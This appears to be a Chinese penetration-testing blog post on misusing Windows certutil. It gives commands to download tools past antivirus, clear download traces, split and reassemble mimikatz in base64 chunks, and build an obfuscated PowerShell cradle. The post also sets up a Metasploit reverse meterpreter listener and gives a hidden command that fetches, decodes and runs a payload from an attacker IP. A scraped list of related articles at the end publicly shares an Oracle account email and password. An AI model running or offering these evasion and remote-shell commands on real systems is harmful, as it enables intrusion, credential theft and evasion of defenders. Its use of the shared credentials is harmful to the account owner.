何为certutil

certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。

微软官方是这样对它解释的:

Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。

但是此合法Windows服务现已被广泛滥用于恶意用途。

渗透中主要利用其 下载编码解码替代数据流 等功能。

这里我首先在命令行用certutil -?查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。

certutil下载文件

一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截。

一般使用certutil下载文件的命令为

certutil -urlcache -split -f http://ip/artifact.exe

这里介绍一下参数

  • -f
    覆盖现有文件。
    有值的命令行选项。后面跟要下载的文件 url。
  • -split
    保存到文件。
    无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。
  • -URLCache
    显示或删除URL缓存条目。
    无值的命令行选项。
    (certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。)

这里我在本地搭建一个http服务器,然后在配置了360的虚拟机cmd下进行下载

这里我为了更好的还原环境,先与虚拟机建立ipc连接后用psexec得到了命令行的cmd环境

这里我用常规的命令进行下载exe文件的操作遭到了av的拦截

如果超时没有操作的话就会显示拒绝访问

这里有两种方法对杀软进行certutil下载绕过,本质都是执行两次certutil

第一种方法是先执行一个单独的certutil,然后再执行下载exe的命令,可以看到这里已经能够成功下载

certutil

certutil -urlcache -split -f http://ip/artifact.exe

另外一种方法就是使用windows自带的分隔符&|,本质上跟第一种方法一样,相当于执行了两次certutil

certutil & certutil -urlcache -split -f http://ip/artifact.exe

certutil | certutil -urlcache -split -f http://ip/artifact.exe

这里也可以进行文件的重命名,如果你觉得这个文件名太过于明显容易被管理员发现就可以在下载的时候使用自己设置的名字生成exe

certutil & certutil -urlcache -split -f http://172.20.10.4:8000/artifact.exe nice.exe

使用certutil下载文件有个弊端就是会产生缓存文件,用如下命令查看:

certutil -urlcache *

执行删除缓存

certutil -urlcache * delete

这里如果嫌麻烦的话可以在下载文件的时候加上一个delete参数,这样就省去了后面再来清理缓存的麻烦

certutil & certutil -urlcache -split -f http://172.20.10.4:8000/artifact.exe delete

certutil base64加解密

之前在实战中就碰到过需要进行内网穿透的时候,代理软件上传不到靶机的情况

这里我上传图片测试能够上传成功

本地也能够下载下来,但是就是到靶机上下载不下来,这里我判断应该是有av对上传文件大小进行了限制。这时候就可以使用certutilencodedecode进行加解密。

certutil在内网渗透中进行base64编码是比较常用的。我们知道在内网中需要用到内网代理,一般都会用到nps或者frp,但是如果碰到有杀软限制上传文件大小的情况,这时候我们就可以使用先用encode编码分块上传再使用decode解密。

使用encode进行base64编码,然而大小还变大了,这里就可以考虑分成多块传输后再进行整合

这里我查看了一下生成的mimikatz.txt有2.7w行,所以这里我将其拆分为三块,这里顺便说一下快速选择大文件的指定行的操作

在notepad++编辑里面点击开始/结束选择,光标会定位到第一行

再使用ctrl + g切换到行定位,选择要选中的行,因为这里我拆分成3块,所以这里我选择的是第10000行

再到编辑里面点一下开始/结束选择即可选中

这里我把mimikatz.txt拆分成了三个txt进行上传

上传到靶机的C盘目录

这里先把3个txt合并为一个txtmimikatz.txt

copy c:\*txt c:\mimikatz.txt    //把c盘根目录下的所有txt合并为mimikatz.txt

然后再使用certutil-decode参数进行解密,生成mimikatz.exe

运行一下看看已经合并成功了

certutil 校验hash值

有些时候官方网站的软件因为一些原因下架的情况下,我们就只能从一些非官方网站下载,而官方通常会把软件的hash值(一般是SHA256)公布出来,这时候我们就可以用certutil校验hash值的功能来检验一个软件是否被其他人修改过。拿原始软件的hash值和现在软件的hash进行比对,使用certutil获取hash值

certutil -hashfile mimikatz.exe MD5 //检验MD5

certutil -hashfile mimikatz.exe SHA1 //检验SHA1

certutil -hashfile mimikatz.exe SHA256 //检验SHA256

这里比较上传前后mimikatz.exe的MD5值

certutil配合powershell内存加载

这里我在本地实验因为环境变量的原因报错,之前在虚拟机实验的时候又忘记截图了,这里还是粗略的写一下大致实现过程

首先修改powershell策略为可执行脚本

下载powershell混淆框架并执行

Import-Module .\Invoke-CradleCrafter.ps1Invoke-CradleCrafter

使用msf生成一个payload,在本地起一个http服务器,放到http服务器的目录下

设置url为http服务器目录

set URL http://172.20.10.4:8000/key.txt

使用以下几个命令进行初始化

Invoke-CradleCrafter> MEMORY

Choose one of the below Memory options:

[*] MEMORY\PSWEBSTRING          PS Net.WebClient + DownloadString method
[*] MEMORY\PSWEBDATA PS Net.WebClient + DownloadData method
[*] MEMORY\PSWEBOPENREAD PS Net.WebClient + OpenRead method
[*] MEMORY\NETWEBSTRING .NET [Net.WebClient] + DownloadString method (PS3.0+)
[*] MEMORY\NETWEBDATA .NET [Net.WebClient] + DownloadData method (PS3.0+)
[*] MEMORY\NETWEBOPENREAD .NET [Net.WebClient] + OpenRead method (PS3.0+)
[*] MEMORY\PSWEBREQUEST PS Invoke-WebRequest/IWR (PS3.0+)
[*] MEMORY\PSRESTMETHOD PS Invoke-RestMethod/IRM (PS3.0+)
[*] MEMORY\NETWEBREQUEST .NET [Net.HttpWebRequest] class
[*] MEMORY\PSSENDKEYS PS SendKeys class + Notepad (for the lulz)
[*] MEMORY\PSCOMWORD PS COM object + WinWord.exe
[*] MEMORY\PSCOMEXCEL PS COM object + Excel.exe
[*] MEMORY\PSCOMIE PS COM object + Iexplore.exe
[*] MEMORY\PSCOMMSXML PS COM object + MsXml2.ServerXmlHttp
[*] MEMORY\PSINLINECSHARP PS Add-Type + Inline CSharp
[*] MEMORY\PSCOMPILEDCSHARP .NET [Reflection.Assembly]::Load Pre-Compiled CSharp
[*] MEMORY\CERTUTIL Certutil.exe + -ping Argument Invoke-CradleCrafter\Memory> CERTUTIL [*] Name :: Certutil
[*] Description :: PowerShell leveraging certutil.exe to download payload as string
[*] Compatibility :: PS 2.0+
[*] Dependencies :: Certutil.exe
[*] Footprint :: Entirely memory-based
[*] Indicators :: powershell.exe spawns certutil.exe certutil.exe
[*] Artifacts :: C:\Windows\Prefetch\CERTUTIL.EXE-********.pf AppCompat Cache Invoke-CradleCrafter\Memory\Certutil> ALL Choose one of the below Memory\Certutil\All options to APPLY to current cradle: [*] MEMORY\CERTUTIL\ALL\1 Execute ALL Token obfuscation techniques (random order)

到这里应该会显示如下代码

Invoke-CradleCrafter\Memory\Certutil\All> 1

Executed:
CLI: Memory\Certutil\All\1
FULL: Out-Cradle -Url 'http://172.20.10.4/key.txt' -Cradle 17 -TokenArray @('All',1) Result:
SV 1O6 'http://172.20.10.4/key.txt';.(Get-Command *ke-*pr*) ((C:\Windows\System32\certutil /ping (Get-Item Variable:\1O6).Value|&(Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand.PsObject.Methods|?{(Get-Variable _ -ValueOn).Name-ilike'*and'}).Name).Invoke((Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand|GM|?{(Get-Variable _ -ValueOn).Name-ilike'*Com*e'}).Name).Invoke('*el*-O*',$TRUE,1),[Management.Automation.CommandTypes]::Cmdlet)-Skip 2|&(Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand.PsObject.Methods|?{(Get-Variable _ -ValueOn).Name-ilike'*and'}).Name).Invoke((Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand|GM|?{(Get-Variable _ -ValueOn).Name-ilike'*Com*e'}).Name).Invoke('*el*-O*',$TRUE,1),[Management.Automation.CommandTypes]::Cmdlet)-SkipLa 1)-Join"`r`n") Choose one of the below Memory\Certutil\All options to APPLY to current cradle: [*] MEMORY\CERTUTIL\ALL\1 Execute ALL Token obfuscation techniques (random order)

将混淆的代码保存到本地为crt.txtcertutil进行encode加密

certutil -encode crt.txt crt.cer

cer.cet放入http服务器目录下,使用msf开启监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.10.11
lhost => 192.168.10.11
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run

然后靶机执行如下命令即可获得反弹session

powershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%\crt.cer (New‐Object Net.WebClient).DownloadString('http://172.20.10.4/crt.cer'); certutil ‐decode %APPDATA%\crt.cer %APPDATA%\stage.ps1 & start /b c
md /c powershell.exe ‐Exec Bypass ‐NoExit ‐File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\crt.cer

关于certutil + powershell的实战食用方法这里推荐Y4er师傅的一篇文章:
极限环境使用certutil+PowerShell配合Burp快速落地文件

原文https://xz.aliyun.com/t/9737

关于certutil的探究-文件下载+编码分块上传上传文件再合并的更多相关文章

  1. Spring MVC-------文件上传,单文件,多文件,文件下载

    Spring MVC 框架的文件上传是基于 commons-fileupload 组件的文件上传,只不过 Spring MVC 框架在原有文件上传组件上做了进一步封装,简化了文件上传的代码实现,取消了 ...

  2. [New Portal]Windows Azure Storage (14) 使用Azure Blob的PutBlock方法,实现文件的分块、离线上传

    <Windows Azure Platform 系列文章目录> 相关内容 Windows Azure Platform (二十二) Windows Azure Storage Servic ...

  3. struts2实现文件上传、多文件上传和文件下载

    总结的两个问题,就是struts2上传下载的时候对属性名配置要求非常严格: 第一:上传的时候 private File file; private String fileContentType; pr ...

  4. SpringMVC单文件上传、多文件上传、文件列表显示、文件下载(转)

    林炳文Evankaka原创作品.转载请注明出处http://blog.csdn.net/evankaka 本文详细讲解了SpringMVC实例单文件上传.多文件上传.文件列表显示.文件下载. 本文工程 ...

  5. 针对个别utf8编码站点在iis7上浏览器编码不能自动识别的解决方法

    个别utf8编码站点在iis7上客户端浏览器编码不能自动识别的编号,输入仍为gbk2312,而不是utf-8,这样导致我们看到的网站为乱码. 要解决这个问题,有两个方法,一为打开网站以后,右键,选择编 ...

  6. [转]SpringMVC单文件上传、多文件上传、文件列表显示、文件下载

    一.新建一个Web工程,导入相关的包 springmvc的包+commons-fileupload.jar+connom-io.jar+commons-logging,jar+jstl.jar+sta ...

  7. 驳《编码规范是技术上的遮羞布》自由发挥==摆脱编码规范?X

    引子: 看了一坨文字<编码规范是技术上的遮羞布>,很是上火,见人见智,本是无可厚非,却深感误人子弟者众.原文观点做一个简单的提炼: 1.扔掉编码规范吧,让程序员自由发挥,你会得到更多的好处 ...

  8. 解惑:如何使用SecureCRT上传和下载文件、SecureFX乱码问题

    解惑:如何使用SecureCRT上传和下载文件.SecureFX乱码问题 一.前言 很多时候在windows平台上访问Linux系统的比较好用的工具之一就是SecureCRT了,下面介绍一下这个软件的 ...

  9. SpringMVC文件上传下载(单文件、多文件)

    前言 大家好,我是bigsai,今天我们学习Springmvc的文件上传下载. 文件上传和下载是互联网web应用非常重要的组成部分,它是信息交互传输的重要渠道之一.你可能经常在网页上传下载文件,你可能 ...

  10. WordPress上传含有中文文件出现乱码

    最近打算学习安装配置WordPress,当然同时也在学习PHP+MySQL,希望以后能做一些关于WordPress定制和二次开发,包括主题和插件.在成功安装WordPress3.5中文版之后,就测试了 ...

随机推荐

  1. final关键字用于修饰局部变量-final关键字用于修饰成员变量

    final关键字用于修饰局部变量 局部变量--引用类型 引用类型的局部变量,被final修饰后,只能指向一个对象,地址不能再更改.但是不影响对象内部的成员变量值的 修改,代码如下: public cl ...

  2. 线上排查:内存异常使用导致full gc频繁

    线上排查:内存异常使用导致full gc频繁 问题系统 日常巡检发现,应用线上出现频繁full gc 现象 应用线上出现频繁full gc 排查过程 分析dump 拉dump文件:小插曲:dump时如 ...

  3. 【HMS Core】一张图片带你玩转机器学习服务

    ​1.介绍 总览 Cloud DB(云数据库)是一款端云协同的数据库产品,提供端云数据的协同管理.统一的数据模型和丰富的数据管理API接口等能力.在保证数据的可用性.可靠性.一致性,以及安全等特性基础 ...

  4. spring cloud alibaba - Nacos 下载安装

    1.关于名字 前四个字母分别为Naming和Configuration的前两个字母,最后的s为Service 2.是什么 一个更易于构建云原生应用的动态服务发现,配置管理和服务管理中心.是注册中心和配 ...

  5. XMind 2022 安装教程 (11-30亲测有效)

    下载地址 下载直通车:立即下载 解压文件 鼠标右击[XMind2022(64bit)]压缩包(win11系统需先点击"显示更多选项")选择[解压到 XMind2022(64bit) ...

  6. ECharts 饼图切换数据源bug 开始没数据显示 切换或刷新后显示

    1.出现问题原因 一个饼图,右上方两个按钮分别为今天和本月,分别调用不同接口控制,点击则调用不同接口同时饼图绑定数据源刷新:出现此问题原因点击今日按钮有一个饼图区域形没有数据不显示,对应数据值比例都没 ...

  7. echarts使用dataset数据集创建单轴散点图

    dataset创建单轴散点图 由于使用echarts作图时,我很喜欢用dataset作为数据源,但是官方案例中,有没有给出相关示例,于是,在翻阅官方文档相关案例之后,结合官方文档使用dataset的示 ...

  8. 使用一个文件集中管理你的 Nuget 依赖版本号

    在 .net 7 以前,项目对于 nuget 依赖项的版本依赖散落与解决方案的各个角落.这导致升级维护和查看的时候都比较麻烦.在 .net 7 中,你可以使用一个文件来集中管理你的 Nuget 依赖版 ...

  9. python下载图片实现方法

    转载: https://www.jb51.net/article/119178.htm

  10. Oracle 账户【2023/2/5最新】

    下载Oracle产品一般都需要登录Oracle账户才可以下载,这里提供一个账户方便大家使用,觉得有用的希望能点个小小的赞! 账号:191049742@qq.com 密码:1234qwerASDF!@# ...